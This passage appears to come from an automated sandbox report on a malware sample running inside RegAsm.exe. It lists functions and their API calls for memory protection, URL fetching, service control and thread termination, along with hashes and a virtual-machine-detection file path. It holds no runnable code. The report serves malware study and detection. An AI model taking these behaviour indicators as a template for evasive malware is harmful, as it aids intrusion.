Instruction Fuzzy Hash: 4DC01284094262BCDF242EA08C6AFBF5528CE607A6BB14D2AF857810018628C880A59A

Uniqueness

Uniqueness Score: -1.00%

Function 00943B2E, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a5cc11f4660b6c0a63e85e4076ab4bdc64a690513a77ca76ad91f56f7e5b6e
Instruction ID: 4ccefd176841f0977de4e7029a6e1ed45ba1bfa46dd7ba9a011ad121471fe054
Opcode Fuzzy Hash: 68a5cc11f4660b6c0a63e85e4076ab4bdc64a690513a77ca76ad91f56f7e5b6e
Instruction Fuzzy Hash: 6AC0C02600014D07B210B1304001FCFD3C6DFB3F94B3E8043806007211E1020D0CD1EC

Uniqueness

Uniqueness Score: -1.00%

Function 009430A8, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00943070,0094310B), ref: 009430D8

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1cacc71feb68c964f6ae05737e7ebed3be4d9ed7d699def80231263da6b2f910
Instruction ID: f26b15f18ed0fa0143af55e0fc069037ff2754553ac4b32272b6c76c3bff81ce
Opcode Fuzzy Hash: 1cacc71feb68c964f6ae05737e7ebed3be4d9ed7d699def80231263da6b2f910
Instruction Fuzzy Hash: 32D08C343C0340B6F9389A209C26FA523058780F00F708A0A7B4A2E0C440F17690D12E

Uniqueness

Uniqueness Score: -1.00%

Function 00943B24, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?), ref: 00943B47

Memory Dump Source

Source File: 0000000E.00000002.571849664.0000000000941000.00000040.00000001.sdmp, Offset: 00941000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_941000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e62acb3c76e9046357b0d5b38bb656fa9e3ab2998d64dfaab96b62744d00bd21
Instruction ID: 68798ee5cedca5505e21d2fb670584e832b669431ec5eccdf2195bdc16c3a776
Opcode Fuzzy Hash: e62acb3c76e9046357b0d5b38bb656fa9e3ab2998d64dfaab96b62744d00bd21
Instruction Fuzzy Hash: E4B0127124005C13A0A073250005B5A01454BD1341FB4C005B4354710ECE29862D33E0

Uniqueness

Uniqueness Score: -1.00%

Function 1D39D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.576783982.000000001D39D000.00000040.00000001.sdmp, Offset: 1D39D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d39d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6ab2a615b4508bb9663d6deeaf22861e7cb2e54c4fa04540ec8b43827eb849
Instruction ID: 8c6a17ff5ee5dd2f60419173d65112ed4274c594bf26e48cb6ff8372a649dde6
Opcode Fuzzy Hash: 3d6ab2a615b4508bb9663d6deeaf22861e7cb2e54c4fa04540ec8b43827eb849
Instruction Fuzzy Hash: E62137B1504240EFDB09DF18E8C5F17BF65FB84328F20C669E9094B246C376D856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D3AD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.576819823.000000001D3AD000.00000040.00000001.sdmp, Offset: 1D3AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2376488f306a2549263eed4b2c0fd813d943868db4a17b5e416f9e2d95b417
Instruction ID: 5d54c26a77f4e554f77dd4faf70b9780f9693e2851eab04dd5c7155be0e4e3b5
Opcode Fuzzy Hash: 2e2376488f306a2549263eed4b2c0fd813d943868db4a17b5e416f9e2d95b417
Instruction Fuzzy Hash: 2B21C575604240DFDB05CF18E9C8B16BB65FB84714F24C66DE9498B246D336D847CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D3AD006, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.576819823.000000001D3AD000.00000040.00000001.sdmp, Offset: 1D3AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3ad000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7c8eba7f9939897dd79147f5e374ada16a0f94ca264a75ebc27022863341b5c
Instruction ID: 930d6e2dccf9f3ebd0c6e2a32b4f4396af9eb02a97f671000b39dbd96746ffb1
Opcode Fuzzy Hash: a7c8eba7f9939897dd79147f5e374ada16a0f94ca264a75ebc27022863341b5c
Instruction Fuzzy Hash: 41216F755083C09FD702CF24E994B11BF71FB46214F28C6EAD8498B297D33A9856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1D39D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.576783982.000000001D39D000.00000040.00000001.sdmp, Offset: 1D39D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d39d000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c79a82c96f2bea8d23c52c15e4d3a50e5b6d05254578cdf5ad61183456536875
Instruction ID: bbddb7b2454fefdf6eb406590226f3ef7c5664f4201348fd265b00942a4c645a
Opcode Fuzzy Hash: c79a82c96f2bea8d23c52c15e4d3a50e5b6d05254578cdf5ad61183456536875
Instruction Fuzzy Hash: 2911C476504280DFDB06CF14E9C5B16BF72FB84324F24C6A9DC494B65AC33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: RegAsm.exe PID: 4800 Parent PID: 484 RegAsm.exeCOMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	58.5%
Signature Coverage:	0%
Total number of Nodes:	123
Total number of Limit Nodes:	11

Executed Functions

Function 00F06032, Relevance: 1.7, APIs: 1, Instructions: 221nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00F05C6C,00000040,00F022E1,00000000,00000000), ref: 00F06061

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 6d4aad02c9fc242d3edd54f53d7b06c7bac1d123be80e5dc7f6a9f44e7b2371b
Instruction ID: dd648cd0bae314fd075dfed45de98a2739b399e18c81bd8a4813a5f20b619064
Opcode Fuzzy Hash: 6d4aad02c9fc242d3edd54f53d7b06c7bac1d123be80e5dc7f6a9f44e7b2371b
Instruction Fuzzy Hash: 46410AA225C6845FE309D724CC99F363BB9EB97725B18419FE082C71D3D164AC469721

Uniqueness

Uniqueness Score: -1.00%

Function 00F060AF, Relevance: 1.7, APIs: 1, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cffd69884bb7acb1885fb78d0f3686b66c64a21ee148af4025a9f52ff86610da
Instruction ID: 762a19471184fedf30dce3b3ef12b78cfa76c97b116d05ddd7eb1331aaaa0bfd
Opcode Fuzzy Hash: cffd69884bb7acb1885fb78d0f3686b66c64a21ee148af4025a9f52ff86610da
Instruction Fuzzy Hash: 7231F13664DA848FC706D7288CA1A253FB1EFA7321B6941DBC081CB1E3D558D85AA321

Uniqueness

Uniqueness Score: -1.00%

Function 00F05DFF, Relevance: 1.7, APIs: 1, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65ebdde05dfd3d6249963b4f080754663618993c42e8f341b1b455697f3d8c1b
Instruction ID: 8abb0a321519ab77903bab0e21fcdd54f52d7bd2d7278cf074b2673d3c12a118
Opcode Fuzzy Hash: 65ebdde05dfd3d6249963b4f080754663618993c42e8f341b1b455697f3d8c1b
Instruction Fuzzy Hash: 8A415D32D04F029EDF248A24CDC9767B750FF11732F58425AC6D28B1C6D3A88592FE52

Uniqueness

Uniqueness Score: -1.00%

Function 00F06048, Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,00F05C6C,00000040,00F022E1,00000000,00000000), ref: 00F06061

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction ID: 8f5be131a22dbd2915fdb11b102d5d31c6b110a07b1c5addfdb7a0585f941792
Opcode Fuzzy Hash: a78abbb85f94ead657e0bc70dedec558cc72e12d4b27a68168c1e001d587ddff
Instruction Fuzzy Hash: 37C012E02240002E68048A28CD48C2BB2AA86C4A28B10C32CB832222CCC930EC048032

Uniqueness

Uniqueness Score: -1.00%

Function 012D2680, Relevance: 9.3, APIs: 1, Strings: 4, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pvc , xrefs: 012D2AAD
Luc , xrefs: 012D294C
Luc , xrefs: 012D2C77
pvc , xrefs: 012D2751

Memory Dump Source

Source File: 00000016.00000002.1038873474.00000000012D0000.00000040.00000001.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12d0000_RegAsm.jbxd

Similarity

API ID:
String ID: Luc $Luc $pvc $pvc
API String ID: 0-1627519697
Opcode ID: 7e78ef502273f3ab5c3129582370706e97ff9ce88a34a690ea05da6a1a49e889
Instruction ID: 07598b629e3e7d9912c1972db7ef8ebb5b600b30dc339db6ec4c9af33b3cd9a2
Opcode Fuzzy Hash: 7e78ef502273f3ab5c3129582370706e97ff9ce88a34a690ea05da6a1a49e889
Instruction Fuzzy Hash: 2212F430A10605CFCB15DFB8C8987AEBBF2AF88344F258469D506DB361DB359D06CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01384200, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0138425F

Strings

Luc , xrefs: 01384215
Luc , xrefs: 013843BF

Memory Dump Source

Source File: 00000016.00000002.1039147002.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1380000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: Luc $Luc
API String ID: 2994545307-1173025873
Opcode ID: e236c49ac4b1954f27ae2d6efe6dde6091745d8c25563225482ec4088f1713a6
Instruction ID: 61b4307115d5142146293195b2cec2995b1131ed8dd64e36dea620aca7d1705e
Opcode Fuzzy Hash: e236c49ac4b1954f27ae2d6efe6dde6091745d8c25563225482ec4088f1713a6
Instruction Fuzzy Hash: 9451A571A002099FCB14EFB4D885BAEF7F6BF88314F148569D5069B791EF70E8058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F03457, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(00F03AA9,00000000,00000000,00000000,00000000), ref: 00F0346B
InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00F0352E

Strings

61, xrefs: 00F03528

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: ea40b8359ad1b2f95f6fd860132d97378338cd9f2411d0df0ce2adba6225a47c
Instruction ID: b4cfa989c07b596c9316ad50bb82f7cdc0517842eae7a5f871071a64e9650ec1
Opcode Fuzzy Hash: ea40b8359ad1b2f95f6fd860132d97378338cd9f2411d0df0ce2adba6225a47c
Instruction Fuzzy Hash: 9F41C231244387EEEB319E10CD95FFE3669EF01390F248525ED4AEA1D0E772DA44BA11

Uniqueness

Uniqueness Score: -1.00%

Function 01384049, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 259libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0138425F

Strings

Luc , xrefs: 01384215

Memory Dump Source

Source File: 00000016.00000002.1039147002.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1380000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: Luc
API String ID: 2994545307-3607267982
Opcode ID: e152b5ced304538100fdd9f63167f77853761f0b9d9883599677d4484d35707a
Instruction ID: 3ce042ab4742b90f883adcfb0fe4eaa675aa977c299384f42146967e046d18fc
Opcode Fuzzy Hash: e152b5ced304538100fdd9f63167f77853761f0b9d9883599677d4484d35707a
Instruction Fuzzy Hash: B491D630B083469FCB06AB78D854B6EBBF5AF86304F1580AAD505DF692EB34DC09C761

Uniqueness

Uniqueness Score: -1.00%

Function 00F034E1, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00F0352E

Strings

61, xrefs: 00F03528

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: 731b7737793b9aa8e175d338cb2d81efee54d492b8a6fd85c27b441af90a62a7
Instruction ID: e81d7191e039d831091dc4f507269c3780abbf19c76c9b61006d897678db21d7
Opcode Fuzzy Hash: 731b7737793b9aa8e175d338cb2d81efee54d492b8a6fd85c27b441af90a62a7
Instruction Fuzzy Hash: FA3192716093879FEB328E20CD55BF93BA8AF02250F180466DD85CA0D2E6369A54FB12

Uniqueness

Uniqueness Score: -1.00%

Function 00F03008, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75COMMON

Download Yara Rule

Strings

C:\Program Files\qga\qga.exe, xrefs: 00F030E9

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID:
String ID: C:\Program Files\qga\qga.exe
API String ID: 0-182997636
Opcode ID: 6d616f9f09d57bf89b0d30bafecd52c9330131c2205cdf84c41b32abd868e271
Instruction ID: 20715cee7153d393f9b064de513f66b88156cb0039082e7c46e42e82ba5d9d0d
Opcode Fuzzy Hash: 6d616f9f09d57bf89b0d30bafecd52c9330131c2205cdf84c41b32abd868e271
Instruction Fuzzy Hash: 2E117B33D0A6859DCE2267304C5B3A47F696F17327FA80286D0D24B0D3D2565A69B356

Uniqueness

Uniqueness Score: -1.00%

Function 00F034AE, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00F0352E

Strings

61, xrefs: 00F03528

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: InternetOpen
String ID: 61
API String ID: 2038078732-4179516829
Opcode ID: c07e9787f902e8b66c54cb079bfa43b4b56e89536942292f53ca4f69b58967e1
Instruction ID: d1d86dcf3957562061028b2e8257aef3838cbcb06b4021201f5a0a4df2d03a17
Opcode Fuzzy Hash: c07e9787f902e8b66c54cb079bfa43b4b56e89536942292f53ca4f69b58967e1
Instruction Fuzzy Hash: 4021B071604387AEEB318E14CE54BFE32ADAF41390F184035ED4A9A1D5E732DA40BA11

Uniqueness

Uniqueness Score: -1.00%

Function 012D2A7C, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 012D2AD9

Strings

pvc , xrefs: 012D2AAD

Memory Dump Source

Source File: 00000016.00000002.1038873474.00000000012D0000.00000040.00000001.sdmp, Offset: 012D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12d0000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: pvc
API String ID: 2994545307-1874424782
Opcode ID: 52c4d3c5594c224d6bd86e0ccc862464fd9b104be5e10fc0dbd27e5c5785f956
Instruction ID: ba7d782ac088a016c3073ce9c0c18e84eb9e4988d7379a6d2c92115d70eca89d
Opcode Fuzzy Hash: 52c4d3c5594c224d6bd86e0ccc862464fd9b104be5e10fc0dbd27e5c5785f956
Instruction Fuzzy Hash: CD21AE30911758DFCB15DFB9D48869DBBB2FF85304F21846DE401AB251D7359846CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F06546, Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: e1c8b52ab60ea0c480f008180d847972117fbb60c01494c97a029091f515ced9
Instruction ID: 93ea11b3a5fbc8fa5fa7d6f5f86af20f0438d542f2ea83a5b1ee0d4b0681f2f9
Opcode Fuzzy Hash: e1c8b52ab60ea0c480f008180d847972117fbb60c01494c97a029091f515ced9
Instruction Fuzzy Hash: EC411472E08605CEDF254E108D583B876F1BF16325FAD426AC852DB1D0D73688F4BB82

Uniqueness

Uniqueness Score: -1.00%

Function 00F04B7E, Relevance: 1.6, APIs: 1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099298e30f8eff466f98cd1f5349cd006a6254cc69d2c3d6a01007ee8b6367f7
Instruction ID: 620e9f073238aa7733e1107d88b32c91a3e4144a2362e4435150586b18788cb4
Opcode Fuzzy Hash: 099298e30f8eff466f98cd1f5349cd006a6254cc69d2c3d6a01007ee8b6367f7
Instruction Fuzzy Hash: AA4136F6A45216DFDF20AE048A907BD3364AF54320B70802AEF47972C1D378FC80B686

Uniqueness

Uniqueness Score: -1.00%

Function 00F01F34, Relevance: 1.6, APIs: 1, Instructions: 147threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00F01F4A

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 740ff14ebd5326ee9ee01f5d15e24c3bc21950fe8197c14106e4f8f677567c39
Instruction ID: 14cf3f4c828ac378b9d51a85984d965f93bf959f127bcbb19f3f0de739455bf2
Opcode Fuzzy Hash: 740ff14ebd5326ee9ee01f5d15e24c3bc21950fe8197c14106e4f8f677567c39
Instruction Fuzzy Hash: 3341ACB2504302EFD7019F64CC8A794B7A9BF0A371F650295E992871E2C375C9C5FBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F06598, Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 0ce4c078b2e38afcddbc9a14c662dbc71e07e6bb529d01935bddefcdb82c47b1
Instruction ID: 2ba715bad009f1d45101f3861188da545a3390b280986052e2f1c025fcd3326e
Opcode Fuzzy Hash: 0ce4c078b2e38afcddbc9a14c662dbc71e07e6bb529d01935bddefcdb82c47b1
Instruction Fuzzy Hash: 0241E672E08606DEEF258A108D193B077E1BF1533AF7D02A9C942CB1D0D72688F4BB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F06511, Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 3d435fce266efd111c92eb0692f45f4184d15cd650e0b7b09583f31c1d1ea774
Instruction ID: e9897a60d0b65be10b0ea9735f6b89e3e209c4dcac634ac5363b039153d506b1
Opcode Fuzzy Hash: 3d435fce266efd111c92eb0692f45f4184d15cd650e0b7b09583f31c1d1ea774
Instruction Fuzzy Hash: 5431C862E08206CEEF395E14CD683B466E1EF55328FB9562ACD03CA1D4D73588F4BB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F0666C, Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 7c04d819a682eec0f0108e10d832ad7c85ed7f9ae75c4e64907ce32ee3369f80
Instruction ID: 4693219e3a665ce8bea336d01d592a0bc8017a5d9ab9c87f0625eccdc2024960
Opcode Fuzzy Hash: 7c04d819a682eec0f0108e10d832ad7c85ed7f9ae75c4e64907ce32ee3369f80
Instruction Fuzzy Hash: D031B472E04706DEDF255A10894D3A0BBE0BF0233AFB945A9C951CA0D0E73688F4FB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F06560, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: ccaea00e1e69481d96ff93c0d8a4daff61a0a1aa6c99d172a278cc9024e522ad
Instruction ID: e0ee482c8dd1d35c583b2c72931c9a49a9d5d0ef3e20be40dd8d1190655ec12a
Opcode Fuzzy Hash: ccaea00e1e69481d96ff93c0d8a4daff61a0a1aa6c99d172a278cc9024e522ad
Instruction Fuzzy Hash: 8E319372E08606DEEF295E10CD587B476E1EF16338FA9526ACD02CA1D0D73588F4BB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F030B6, Relevance: 1.6, APIs: 1, Instructions: 104fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00F03070,00F0310B), ref: 00F030D8

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 358f9cf4e2a1fa2bd14ebb3a650c4fd4bb1b75bbc98b5f7d3781ee70ddc4b0f7
Instruction ID: 6502737ba387a1ecd399c06290342f7c0aeb5745636901b6b3d3bfea56b930e9
Opcode Fuzzy Hash: 358f9cf4e2a1fa2bd14ebb3a650c4fd4bb1b75bbc98b5f7d3781ee70ddc4b0f7
Instruction Fuzzy Hash: 8121BEB2D04310AECB209A048DC6BA9B36EFF0E331F304114D942971D3C375DB82B569

Uniqueness

Uniqueness Score: -1.00%

Function 00F0657C, Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 1d2b3b659df63cc12f6d2f92c946e2a96161cea0a1d6b7f8d410c0816fc15ed4
Instruction ID: f959683c228faa7226ab25bdd43667969b8460609fab869436a5b4d9455795a6
Opcode Fuzzy Hash: 1d2b3b659df63cc12f6d2f92c946e2a96161cea0a1d6b7f8d410c0816fc15ed4
Instruction Fuzzy Hash: D331A462E08606DEEF394A10CC587B476E1EF12339FA9526AC903CA1D0C73588F4BB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F066A8, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 39eeb9493f5df4e1c7169d77a6e29ace5de429bd713a59114d727c0c0cbf6c00
Instruction ID: 53d3bb94c0855dd09971f90c79b61b90b8496bc6ab59c3d79334bee5ecd240e1
Opcode Fuzzy Hash: 39eeb9493f5df4e1c7169d77a6e29ace5de429bd713a59114d727c0c0cbf6c00
Instruction Fuzzy Hash: 9A319972D04706CEDF155E1089493A07BE1FF1232AF7941A9C951CA0D1E73599F4F752

Uniqueness

Uniqueness Score: -1.00%

Function 00F065CC, Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: e788485755d63f0236ac53d550a05d17968df2b4be71476e0220b0958d8f344c
Instruction ID: 70e36ebb1121b0a4080a16a6b499d463375e8f6c47177535081d65ed216cb94b
Opcode Fuzzy Hash: e788485755d63f0236ac53d550a05d17968df2b4be71476e0220b0958d8f344c
Instruction Fuzzy Hash: E131C172E08606DEEF254E10C8187B476E1FF16339FA9526AC952CB1D0C73688F4BB52

Uniqueness

Uniqueness Score: -1.00%

Function 012BB849, Relevance: 1.6, APIs: 1, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 012BB961

Memory Dump Source

Source File: 00000016.00000002.1038789849.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12b0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3d34bf434e63a5faef3fc9b7c697fc389e5b42db09544698e9d1ecfd5913fb38
